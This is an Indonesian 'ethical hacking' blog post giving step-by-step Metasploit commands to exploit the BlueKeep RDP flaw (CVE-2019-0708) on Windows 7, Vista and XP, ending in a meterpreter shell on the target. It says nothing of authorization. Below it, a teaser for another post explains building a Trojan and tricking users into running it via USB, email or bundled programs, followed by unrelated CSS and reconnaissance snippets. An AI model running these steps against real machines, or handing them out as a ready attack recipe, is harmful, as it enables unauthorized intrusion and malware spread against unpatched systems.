ethical hacking part 13 bluekeep vurlnerability

-

ethical hacking part 13 bluekeep vurlnerability

Kita akan belajar mengexploit sistem Window 7 Yang memiliki bluekeep vurlnerability,

Target target system Yang biasanya memiliki bluekeep vurlnerability

Window 7
Window Vista
Window xp

Apa itu bluekeep vurlnerability,bluekeep vurlnerability ini dengan code cve-2019-0708  Yang terdapat pada RDP(remote control protokol) Silahkan baca dokumentasi resmi nya langsung.

Dan untuk bisa mengexploit Window 7 Yang memiliki bluekeep ini ,port 3389 itu harus terbuka ,jika port nya tertutup maka Kita tidak bisa mengexploit nya

Saya anggap port 3389 target kalian sudah terbuka Dan bisa mengikuti tutorial ini

=> Buka metasploit msfconsole

=>Search bluekeep

=>show options

=> set RHOST ipaddres

=>shows target

Di sinilah ditampilkan target Yang bisa di serang Silahkan pilih sesuai dengan window target kalian kalau saya memilih window 7 Yang normal berarti Ada di nomor 1

=>set target 1

=>exploit atau run

Dan seperti biasa jika berhasil akan Masuk kedalam meterpreter Dan kalian sudah bebas mau melakukan apapun didalam target mesin



Komentar

Posting Komentar

Postingan populer dari blog ini

ethical hacking part 14 membuat malware Trojan

-
Gambar
ethical hacking part 14 membuat malware Trojan Di tutorial Kali ini Kita akan belajar membuat virus Trojan , apa itu Trojan ,Trojan ini adalah sebuah malicious software (malware) Yang merupakan file exe Yang berbahaya Yang dimana didalam file exe tersebut Kita memasukan payloads Yang Kita gunakan untuk memperoleh akses pada target mesin Untuk menggunakan Trojan ini Kita harus memasukan sendiri Trojan kedalam target mesin ,caranya bisa saja Kita gunakan USB,kirim melalui email apapun caranya Yang penting Trojan ini bisa masuk kedalam target  mesin Dan user dari target mesin nya harus menjalankan Trojan tersebut ,Cara nya bisa saja Kita masukan Trojan nya kedalam sebuah program Dan ketika user mendownload,menginstall Dan menjalan program tersebut Trojan nya akan memberi Kita akses ataupun Kita sisipkan kedalam sebuah gambar (image) Dan ketika usernya membuka gambarnya maka Kita Akan memperoleh akses ,membutuhkan skill sosial engineering tinggi untuk melakukan exploit i...
Baca selengkapnya

CSS layouting - box model: CSS reset

-
Gambar
CSS layouting -  box model: CSS reset Ketika kalian membuat sebuah box itu terkadang terdapat ruang kosong di sisi Kiri element nya ,padahal Kita belum tidak atau belum menambahkan style padding/margin . Supaya Kita dapat kendali penuh untuk styling element nya itu Kita gunakan yang namanya CSS reset. Metode CSS reset sederhana * { padding:0; margin:0; } Atau jika ingin lebih komplek bisa search di browser CSS reset nanti akan banyak CSS reset yang sudah dibuat oleh orang lain Dan Kita tinggal copy Dan paste .
Baca selengkapnya

ethical hacking part 3 reconnaissance & information gethering

-
Gambar
  ethical hacking part 3 reconnaissance &    information gethering Saya sudah sampaikan tentang reconnaissance Dan information gethering ini sebelum nya Dan sekarang Kita akan mempraktekan nya Ada 2 Cara untuk melakukan information gethering ini Yang ke satu active information gethering Dan Yang kedua passive information gethering Active information gethering ini adalah Kita mengumpulkan informasi dengan Cara berinteraksi langsung dengan si target. Passive information gethering ini adalah Kita mengumpulkan informasi tentang si target dengan melalui pihak ketiga atau melalui middle source  misal nya Kita browser di internet dengan Google untuk mencari informasi tentang si target. Apapun Cara nya tujuan nya Sama yaitu mencari informasi tentang target Tools tools Yang bisa Kita pakai untuk melakukan information gethering ini ada banyak yaitu ping,whois,nslookup,whatweb,theHarvester, Hunter.io Dan Sherlock. Kita akan mulai dengan melakukan active...
Baca selengkapnya